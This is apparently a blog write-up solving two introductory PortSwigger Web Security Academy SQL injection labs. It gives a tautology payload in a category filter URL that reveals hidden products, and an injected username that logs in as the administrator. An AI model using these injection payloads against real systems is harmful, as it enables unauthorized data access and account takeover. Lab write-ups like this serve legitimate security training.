SQLi - APPRENTICE

Posted on | Post modified | In |

SQLi - APPRENTICE

tags: Portswigger Web Security Academy Web

Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

  • Hint: This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following: SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Exp

Payload: https://0a2700a903496ccd807a2626001400e3.web-security-academy.net/filter?category=%27%20or%20%271%27=%271%27%20--%20#

Lab: SQL injection vulnerability allowing login bypass

  • Hint: This lab contains a SQL injection vulnerability in the login function. To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Exp

Payload:

  • Username: administrator' or '1'='1' -- #
  • Password: Arbitrary

Reference

Burp Suite Security Academy Writeup